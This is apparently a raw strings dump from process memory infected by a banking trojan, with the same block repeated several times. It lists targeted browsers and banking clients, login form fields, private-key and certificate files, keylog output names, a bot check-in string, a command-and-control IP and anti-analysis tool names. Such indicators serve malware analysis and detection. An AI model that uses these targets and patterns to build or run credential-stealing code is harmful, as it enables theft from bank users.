\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1280_rwx_005E0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1280_rwx_00640000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Dwm.exe_1376_rwx_007A0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

